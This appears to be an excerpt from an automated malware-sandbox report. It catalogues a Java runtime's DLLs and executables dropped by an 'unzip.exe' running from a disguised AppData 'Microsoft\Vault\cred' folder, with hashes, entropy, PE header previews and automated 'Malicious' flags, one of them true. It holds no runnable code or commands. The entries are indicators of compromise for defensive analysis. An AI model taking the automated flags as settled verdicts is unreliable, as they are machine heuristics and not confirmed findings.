SHA-512:	77A43AE01E36EAC0C161CAE4867509754F1CD332302CDDC22A787118A24049A6C3B49742CAF37F10B4F5DFC7C6E7A62260C7D432D855F4B0426DFFD537691E1E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V(.1.I.b.I.b.I.b.1db.I.b.7.c.I.b.7.c.I.b.7.c.I.bY1.c.I.bY1.c.I.bY1.c.I.b.I.b.H.b.7.c.I.b.6.c.I.b.6.c.I.b.6.b.I.b.6.c.I.bRich.I.b........................PE..L...rT.f...........!...$.....6............... ...............................p............@.................................@...,.......X&...........<...(...@..t,...S......................@S......PR..@............ ..x...........................text............................... ..`.rdata...... ......................@..@.data...P)......."..................@....rsrc...X&.......(..................@..@.reloc..t,...@......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\glib-lite.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	575616
Entropy (8bit):	6.05401138277045
Encrypted:	false
SSDEEP:	12288:0cufIxYoAu3wP6dzB12Vo7d/IvvEbYV+W9eh:h0IxYi+6dtQO7d/IvA2+W9eh
MD5:	FBAA454E7B95CB2C978F1F20A56A8CB5
SHA1:	2471D481C167733E5BC722D8B6230FBEAAAE0F7F
SHA-256:	34EA2ECB5EF4184E657F2C670E2A6F623E7B6FAD53A10C1A5DF022EE5EDDB703
SHA-512:	E39D057B0BCE403F49D37B0240D732CD840777DECF187E66224AB5F260AAEC281F39AFC2220AFC8BF86DDF9B33DB4EACD66F96E9C823095063842C84A9B79B24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]k.=...n...n...n.r.n...n.t.o...nRr.o...n.trn...n.t.o...n.t.o...n.t.o...n.u.o...n.u.oG..n...n...nRr.o...n.u.o...n.upn...n.u.o...nRich...n................PE..L...#?.f...........!...$.\...P.......N.......p.......................................'....@..........................N.......V..\|........................(..........H..............................HG..@............p...............................text...l[.......\.................. ..`.rdata.......p.......`..............@..@.data...."...p.......\..............@....rsrc................p..............@..@.reloc..........,...t..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\gstreamer-lite.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842880
Entropy (8bit):	6.706916643277661
Encrypted:	false
SSDEEP:	12288:kvxrNZcgJzVQB4j+N40YJpfD/VeS9HAL/HYsHH3dsusu5NA/WOIGYoC7oLjRkruM:kvJNZcgJIngkSRWDHHtXOJRcVS+RN
MD5:	2DA1DE5FC9B3EF1A4EE080BF3CACA08D
SHA1:	19036AED31FCAD4B85188791DE63EA80B561EA40
SHA-256:	3E98C6C374B6D4FC1AE42CE1EE81C864D8E36B9B6C59C04E62FF274B97596238
SHA-512:	FB4B183B4EEAEED103781FCB73C31C70DE2DC2C90A6325A4E27218BEC389FA7C5025CDD229E726414274855D06974BA439748743BD8764602892F686BF1BCC09
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j{.<...o...o...o'bgo ..o.d.n-..o.d.o-..o.d.n?..o.d.n$..o.d.n ..o7e.n/..o7e.n...oeb.n$..o7e.n,..o...o}..o7e.n/..o7e.o/..o7e.n/..oRich...o................PE..L...9?.f...........!...$............}........ .......................................=....@.....................................,....P...................(...`.........................................@............ ..p............................text...k........................... ..`.rdata..p.... ......................@..@.data....+... ......................@....rsrc........P....... ..............@..@.reloc......`.......$..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\hprof.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139392
Entropy (8bit):	6.659775120920694
Encrypted:	false
SSDEEP:	3072:CH5I0FYyjzs9Nr9RnX3o15gUryxzztpnZYmR3uhr26cPy4Bsa+3NfnH:eypZZTua+ZH
MD5:	70BE7CD444A02C79D4CB73D0F3A3608E
SHA1:	748172F8BBD797428E0C7901D8D6106AB6274EDF
SHA-256:	4DDF5D68102165549C3FA22EC225628EFBE53029FFC7020AE53AC21E00D4D1EB
SHA-512:	1A5B590D8DD07EC2B10E2C1DD230006F37FAC2A86FB97FE0D129B43066267D77CCB1DE76F4AE97B8E31AC597C19BE14FD8278F38DE1FFBB819738DDB3D0F7B3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........6..e..e..e..e..eB..d..eB.\|e..eB..d..eB..d..eB..d..e...d..e..e..e...d..e...d..e..~e..e...d..eRich..e........................PE..L...}^.f...........!...$.....\|..............................................0.......K....@.............................l...L............................(......T... ...T...........................`...@...............d............................text....~.......................... ..`.rdata..$T.......V..................@..@.data...D...........................@....rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\instrument.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	188032
Entropy (8bit):	6.84513743080432
Encrypted:	false
SSDEEP:	3072:9GoSSdfgKji9w4mGTvLig4BmdBnBxh5XM5vjFknaHGRKoUWYFDGTTxXvCN5V:sCBi9wTiBLXuvjuaHGRKooGTNa1
MD5:	654E858770880807CA9DEE1458B1C181
SHA1:	9A4EA8ED90A5CEA977FD1D3F7087C8F1CD4DAD57
SHA-256:	8E699A8E5A619A8A5AA986D20D5C97F40EC238BACB9453EE04BBA6C34CFA1821
SHA-512:	E86BD6668BFDC3D580FA7A4E0AB92EBA35EF80BE8992C8B3CC9239AB3FFB905167B0D61A37C87669691B796A71BBCCA6860E0A2E750DCF9AFFD0B57A9880684B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......mQ..)0r.)0r.)0r.bHq.$0r.bHw.0r.bHv.=0r.bHs.*0r.)0s.s0r.N..,0r.Nw.60r.Nv.&0r.Nq.=0r.0Ov.=0r.0Or.(0r.0O..(0r.0Op.(0r.Rich)0r.........PE..L....^.f...........!...$............................................................f@....@................................X...(........................(..........p...T...............................@...............4............................text............................... ..`.rdata..<...........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\j2gss.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	44160
Entropy (8bit):	6.72875212089843
Encrypted:	false
SSDEEP:	768:DmJY6EK407XXEpEJVUzdjo9Nfnv2Ca3qkwi2u1yjklsg6rE10+CYizWrAMxkEJk:rYaBCfOCa3qkwi2uojklsg6rQ0+C7zW0
MD5:	EBA13D26E3757CA1C6293DD55BD9758B
SHA1:	971AB833241C83C6293958A74DF6067C062F8B66
SHA-256:	1206C3AAE37BEE77D27D30A563B8ECB7DC6F633822E29B9BF4F33B1289D85E89
SHA-512:	E31CE4D39A41B23FE6B5E91E3A518FF64C9FF5BAB7DED4A474A254160AE2C777784D56BC70957CAA2AB3626EB36E156EE4FF70DC6F550D29FDED0B8B387EAEC7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0X..^...^...^.......^._._...^..._...^..._..^._.[..^._.Z..^._.]...^...Z...^...^...^......^...\...^.Rich..^.................PE..L...}^.f...........!...$.B...B.......H.......`......................................."....@.........................`... .......x........................(.......... ~..T...........................`}..@............`...............................text....A.......B.................. ..`.rdata.......`...0...F..............@..@.data...$............v..............@....rsrc................x..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\j2pcsc.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23168
Entropy (8bit):	6.701524028855213
Encrypted:	false
SSDEEP:	384:e8rJcy7XCJm0jcOJw1yo1nofIIYi1oxAM+o/8E9VF0NyxTm:bJlXCxC/ofRYiyAMxkEa
MD5:	E3A7EC1FF53F939F86DD3351F44E13AF
SHA1:	2B4F176E1E57BBAFB278109C60D505DF4B160526
SHA-256:	62AD8AE9A81151C6BEB82E7777D338ECD478A0E3D485DFC30764A1FF48C998DD
SHA-512:	1426DDB3EF01E4FEA50CBA7C518817A27EC6730E1B199D7418F58B8E7686D1A6D6E81A5CD00D1662BDBF73057BAB1314D6E7FA742365D767C67ECDFBC7CC8195
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.q_/.q_/.q_&.._).q_..p^-.q_..._..q_..t^$.q_..u^%.q_..r^-.q_d.p^.q_/.p_..q_6.u^-.q_6.q^..q_6.._..q_6.s^..q_Rich/.q_........................PE..L...}^.f...........!...$............{........0...............................p......E.....@.........................p6......P9.......P...............2...(...`.......2..T...........................P1..@............0...............................text...A........................... ..`.rdata.. ....0......................@..@.data........@.....................@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\j2pkcs11.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61568
Entropy (8bit):	6.643483978214991
Encrypted:	false
SSDEEP:	1536:vkRttHAo5F8C8xJEexLR4CwfZslM757oeXNahV6VCv593vhRVviuXg98KFYVinbj:vkRtN5F8J8exLR4tRsleoYAExH
MD5:	31E94144A238F4E370DBEBA47B3A0B70
SHA1:	47F5285FCB2B0D157BE54740FFC5173DC67955A0
SHA-256:	01172D4C9C39393D9F33726E616FCA2229712032B68AD21832323AA71796FC44
SHA-512:	93CEBE3387FEED0728D0FFBFEBE00729D62C96B2053ABE15339C3412752B8598472FA89CB6DAEAD5E4CFE36AC7F0B92D4AAC6CA4B22BC0B1D5894700CDAE8278
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..\\|..\|..\|..u.2.t.....~..7......\|..S.....w.....v.....~..e...r..e...}..e.^.}..e...}..Rich\|..........PE..L...}^.f...........!...$.....@......k...............................................C6....@............................\...L............................(......@...p...T...............................@............................................text...9........................... ..`.rdata...........0..................@..@.data...............................@....rsrc...............................@..@.reloc..@...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jaas_nt.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25728
Entropy (8bit):	6.709623012390212
Encrypted:	false
SSDEEP:	384:8/IUTZjGWwEIWJ4jE53V4EP91rIYi1ofFAM+o/8E9VF0NyV7YX:8/tTZ6HzWKEPTUYiuFAMxkEg
MD5:	8BF9414F0C7EC183BE4ACAC0362A31E2
SHA1:	BE94BA71D52D2A27F6C8651E979D210399CE2193
SHA-256:	C2C00EC5B130AAA820EB792D9B3CE860EF94991BAD258370AF023E9EB19E8504
SHA-512:	F89DE58A0050C5350E921DBED88BEE3A50DF095D72A07DCB9D52DCFC66C3FDCFD3CEA61EFC3F2672ECBC73F073036AD8920A11F64DA19D7F399654320F460DE1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e.*...y...y...y.\|gy...y)z.x...y)z.x...y)z.x...y)z.x...y.\|.x...y...y...y.{.x...y.{.x...y.{.y...y.{.x...yRich...y................PE..L....^.f...........!...$..... ......) .......0............................................@.........................`;......(<.......`...............<...(...p..\....7..T...........................H6..@............0...............................text............................... ..`.rdata..B....0......................@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc..\....p.......8..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39552
Entropy (8bit):	6.658762873027801
Encrypted:	false
SSDEEP:	768:TSVwOpnsKYHjWbSPRs+BnpfrrcqbVUjvzgYiFAMxkEq6Q:BkshHPPRs+BpfrZUjv079x+
MD5:	B9A8EDE254E86B8D1A4D76C3E4FDD630
SHA1:	732FDE0C4BB3E8AFCE434F8555F5C1D6339F819E
SHA-256:	63CEA5624EAE89B1B4516007FDAC8E2E2C86F62A0FECF5819B66D251E82349FD
SHA-512:	E72C81AF54873F3485EB8FC9CC1758F0F960F04339AE47D8CDF1C2199228F8226AE8061D212AB2A7079B147E4ABDEB6164DB35E7DABB313B941F3530307F906F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............W...W...W..FW...W"..V...W"..V...W"..V...W"..V...W...V...W...W..W...V...W..*W...W...V...WRich...W........................PE..L....^.f...............$.8...6.......4.......P....@.......................................@.................................$i.......................r...(......<....b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc..<............l..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.805209219720468
Encrypted:	false
SSDEEP:	384:af/iHJTRjUy1d82TUefiIYi1o5tAM+o/8E9VF0Ny1+:af/iHX8ERfvYiUtAMxkEG
MD5:	8485E682A283E9971FF397F8F19FB055
SHA1:	182E3A25FC16BA31955E1F664965AAE1C581C1E7
SHA-256:	1CA556DA3FC9D6A33FDCEFAE0F74A63E260E147B30E120709AF7AC672D1832C5
SHA-512:	D833D13B6C2602A5C3AFBDEE15F69A2F71A65AA8E7191A14684D17889971E3CDB741318CBD580801D1E8E34274B0EDE807D65D3810370B18EC11CEF93882531A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`.......:....@..................................&.......@..h............0...(...P......h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...h....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\java.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	141440
Entropy (8bit):	6.772891588977665
Encrypted:	false
SSDEEP:	3072:zaEdbLYj4cxO5MDFOi3lQUKEaJweNi3tLR7Jr2EyfF+1F:5vYO5M5v9N7AJFy
MD5:	931C30DA9061F4F39B5716079C6929B2
SHA1:	22736A7634163639B99A7A43C24818E2B0AB736C
SHA-256:	B645444B88A8047F64AA57E6D3D246A989F5E70D6DDFDF21347CEFC902512ED6
SHA-512:	E7D8CD387457D275719E114F47C2EFEEE8B397FD91310D47CEBB11711D4EDFEFE73EF932C3BE32A78D51BABF63B13E235A766508030FD42F3C0753CBDA167836
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."l..f...f...f...ou?.v....s..d....s..l....s..c...-u..`....s..i...-u..g....r..c...f...]....r.......r..g....rS.g....r..g...Richf...........PE..L...~^.f...........!...$.D..........gJ.......`...............................@......j:....@..............................A......,........................(... ..........T...........................@...@............`......,...@....................text....B.......D.................. ..`.rdata......`.......H..............@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\java.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	269952
Entropy (8bit):	6.811260411348692
Encrypted:	false
SSDEEP:	6144:iRwxuybHGybMb3Q/W7Gj4NoToKeovzQOa:iyuyzGybMFNNcNHvz3a
MD5:	11875D6D3419BF7268BAD9014B918832
SHA1:	C23DE9AE5E58F4EBC131AA3BC2E5B535DAEEA21B
SHA-256:	29F9F4B20650B3218E75B1DABD323E7105FE87A3CAF8D2068570D044C7055D04
SHA-512:	62DF0B3947937282063D17792A3CF38F81F49C1755369810F0A38FE2167268167C8131E46E16F213A77BB640BB59EF96C962FA28B3EBC4D67BA63980DFEDFF25
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&..,&..,&..,m..-)..,m..-...,m..-2..,..",!..,...-...,...-4..,...-2..,m..-/..,&..,U..,?..-)..,?. ,'..,?..-'..,Rich&..,........PE..L....^.f...............$.x...z......<.............@..........................0............@.................................TT..d.......................(..........0E..T...........................pD..@............................................text... w.......x.................. ..`.rdata...............\|..............@..@.data........`.......L..............@....rsrc...............X..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\java_crw_demo.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30848
Entropy (8bit):	6.788772215801136
Encrypted:	false
SSDEEP:	384:wiBty0QKtwjgTJvoJlQzTJjjoZ3ArtFkUIYi1oNAM+o/8E9VF0NyniY:z0PKVzTkat2lYiaAMxkEYY
MD5:	A17F2499277E977895902A52E5F7256F
SHA1:	2878B61B4DE6BDFD81124AE5FECB9D1EEF4FA1AD
SHA-256:	B1CDBAA570DA2F6A1DBACDE52B9D60B3B3173740726105802650219D52CFAC2C
SHA-512:	4CECA40EE39071C40CBCED292E2063683A9540D16344C0765B9D569ACC9D9E3C850147A9B7D0BD73F6C65A898F612CD0BAA151D25C3C04914F72F1FD67768BE8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..$%..w%..w%..w,.Nw-..w...v'..wn..v&..w%..w...w...v...w...v/..w...v$..w<..v$..w<..v$..w<."w$..w<..v$..wRich%..w........................PE..L...~^.f...........!...$.2..........67.......P.......................................7....@.........................pY..\|....Y.......p...............P...(......t... U..T...........................`T..@............P...............................text....0.......2.................. ..`.rdata..n....P.......6..............@..@.data...\....`.......F..............@....rsrc........p.......H..............@..@.reloc..t............L..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javacpl.cpl

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	226944
Entropy (8bit):	6.586550643984961
Encrypted:	false
SSDEEP:	3072:53Zt07sxUJw4+gaMevpRTTezqES9Q3nA3gZyYhkgKzKMxorC7FQKFYeaTljZqMNa:Xt0gGTaMETezqES9IAHYeVzKaSaKXva
MD5:	FDE8563C69FED8C01763FB3FEE04C73F
SHA1:	46E3C7537B670F13E44E33412CCBC26CC64448E0
SHA-256:	5612C7AEC4DEE5282CB2A62F2DE737B01D9E3F9470F323907CE259F3D1BD52A5
SHA-512:	8FEDBDF09AB2E75E9201D553A673E006471BB126071FED61E78933643927F74FF9039A5F7C37183D35977BA211D06AA27FBA52A705E21C23B5DAA2A4D99EF74B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V.YL7..L7..L7...O..F7...O...7...O..X7...I..\7...I..X7...O..E7..L7...7...I..b7..UH..O7..UH..M7..UHo.M7..UH..M7..RichL7..........PE..L...o_.f...........!...$.....l.......N...............................................&....@.........................p...\......d....................N...(...`..........T...........................@...@............................................text............................... ..`.rdata..............................@..@.data...`...........................@....rsrc...............................@..@.reloc.......`.......6..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	94336
Entropy (8bit):	6.218881482506975
Encrypted:	false
SSDEEP:	1536:NevQ/EJs8nBsKs8nBsn+ECBVq7qjh3rmKPNSn7+Cx+:NeE3nJC7NjZqMNSnax
MD5:	475613F763D700F1380185C3CE8E2181
SHA1:	55F35AEF945C2F1FE483EE63F5DE70F36689E425
SHA-256:	7E22ACF2BC7CA6DE7B3C05EAD3CC14AAE895B3A2502B84FBFD7CEBA546C84C0B
SHA-512:	24513A69EC022C7F43F457425CBE21E2A731B9D6A7D4A3FB1D1C611A25CDDFF7CCF44CDCC35E58D91121D72591400C85C718250FDCECC4F56EDF41659E0F6F1D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........eV..6V..6V..6_.&6B..6..7T..6..7[..6..7U..6..7_..6V..6..6..7q..6O.7U..6O.J6W..6O.7W..6RichV..6........................PE..L...u_.f...............$.P...........K.......`....@.................................V.....@.................................8...@....................H...(...p.. ......T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc.. ....p.......@..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javafx_font.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63616
Entropy (8bit):	6.723941914081603
Encrypted:	false
SSDEEP:	1536:5rw/8YCpFcsQmdmNID8nlpMJT8/ONE0t7UdxT:5rx55INID8nlp+8/ONE0t4/
MD5:	A2165AF53877DCF88C125563E69ABB64
SHA1:	C7F21350E8A9029CB4B47754D77A6F82028EA0BE
SHA-256:	86EF5959ABD53FD5A777F884ACC393950EDC3C72C66BF03DA1D97C17BB48B88A
SHA-512:	4A70E2C62E64A5B6786DB96530D9481559B62C2F324EEB498D31C0359752E7E699794C0ACD502A590E6B08E556DBA0D292022CF70439994B2717FECAD436D84F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................s....(....(......(....(....(........................................Rich...................PE..L...iT.f...........!...$.t...^.......x..............................................B=....@..............................................................(..........X...................................@...............H............................text...:s.......t.................. ..`.rdata...F.......H...x..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javafx_iio.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	145536
Entropy (8bit):	6.62784553026111
Encrypted:	false
SSDEEP:	3072:JAp5qIkEUJ7N+TFck/2pd9VvvgjIj4YPxWe/bdZda6xZj:JADRUVoWu2pd9VvvgjIj4iLda6f
MD5:	5DAD61E66266844963B09DFD574C6E01
SHA1:	E264B6CCB50205B01AAAAB8556E81B83733111FF
SHA-256:	5ACCFE84EAFD76369FCF566A9A14BAE1C487C6B117A6D2C74712D53F89704602
SHA-512:	49C3B2F5B58D6A85C285D3946D84B62BF9A44EA77E5A4D59D2785E369CEEDDAC8439B697772E687E9389633CC8CC18FC45CD1818CBFA4AE5B4CF888008E54D4B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E @=.A.n.A.n.A.n.9.n.A.n.?/o.A.nJ9/o.A.n.A/nA.n.?+o.A.n.?o.A.n.?-o.A.n.>*o+A.n.>.o.A.n.>.n.A.n.>,o.A.nRich.A.n................PE..L...vT.f...........!...$.....F...............................................P............@.........................@.......<........0...................(...@..$.......................................@............................................text............................... ..`.rdata...4.......6..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	269952
Entropy (8bit):	6.81429483109644
Encrypted:	false
SSDEEP:	6144:+4w0wEmbyS7KM5i5KoPpE/fK7ToFQ8fv+7WP:+qwEmuS7KMi+fK3xCv+7WP
MD5:	7270D33BAB4BD8AFE03E6D3F36A51D20
SHA1:	57E508FFE4FE95CD88F5DD41F4CFE5C199F8DCEA
SHA-256:	8F1122595715CE1B5C72DA243B154B250693D4EB54F5696E23450288F82B34B9
SHA-512:	E94D51B66CF1A4454D2D293332E0BA3873DDD6016996198569C41751F2C94AE9E3E67C6B2BC825DAF8F3E374612B47441FA922C48D7BE4BCB241FB08B5DB45CB
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.D.+..+..+..`.).$..`./....`...?.....,..../........9....).?..`.+."..+.+.X..2...$..2....2.(...Rich+..........................PE..L....^.f...............$.x...z......D.............@..........................0......{#....@.................................TT..d.......................(..........@E..T............................D..@............................................text....w.......x.................. ..`.rdata...............\|..............@..@.data........`.......L..............@....rsrc...............X..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	405632
Entropy (8bit):	6.430242134011099
Encrypted:	false
SSDEEP:	6144:s5rFpHfc7gJtFA3pAVato8vsEkZV+4LhBoFopScG+CvFPbL:sbp/ccJtK5TvsI4clKCv5P
MD5:	DDC5988EB4B4CC5BEE5921C3D9425325
SHA1:	70FF120AB7FAD26211BD00BDC9DF7DDB48C0FD06
SHA-256:	9559835CEF3BEC420CA36E8CC420ED316EECF0E03ACE26C0FD4B94B3ED7C3E0A
SHA-512:	632D06E5CC103BBB9B572363EDBBD40734288CF64A80C98211D452C0DDD12719A379D94350AC1E76E15C714367A57E10F232413AA5979654BA6055736630FCF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bd.a...2...2...2M}.3...2M}.3...2M}.3...2.{.3...2.{.3...2.{.31..2M}.3...2...2...2.z.3...2.z.3...2.zW2...2.z.3...2Rich...2........................PE..L...O_.f...............$............i.............@.................................~#....@.....................................x........................(...P...)......T............................T..@............................................text...<........................... ..`.rdata...%.......&..................@..@.data...D........t..................@....rsrc................^..............@..@.reloc...)...P...*..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jawt.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19584
Entropy (8bit):	6.789491913950024
Encrypted:	false
SSDEEP:	384:FKRSM5y4JhvMjb/5J3nztIYi1o6nAM+o/8E9VF0NyOgMe:FnMs4rv4/3z6YiBnAMxkEj
MD5:	855ACDD169910F5A34F88B4AE5EABB51
SHA1:	CA90F3B8180E78A6EABB6EBDC0003B8A3233697E
SHA-256:	8381D578F140B3913DCC2C83E16299A4B7CF952C517031FB17534A86FD1B723C
SHA-512:	8FF7933A4A21868BD28600CA29B1C094BCF6B99DF4775B1BCBA3212A12A0855FF4C44ACB11D704E96CCCD6DAC67ECAE49E620B45E8011FFFFB1D16D4498B1D61
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................X....A......A......A......A..........................................4...........Rich...........PE..L....^.f...........!...$..................... ...............................`.......D....@..........................%..L...<&..d....@...............$...(...P..T...x!..T............................ ..@............ ...............................text...k........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..T....P......."..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\jdwp.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	177280
Entropy (8bit):	6.71537510096446
Encrypted:	false
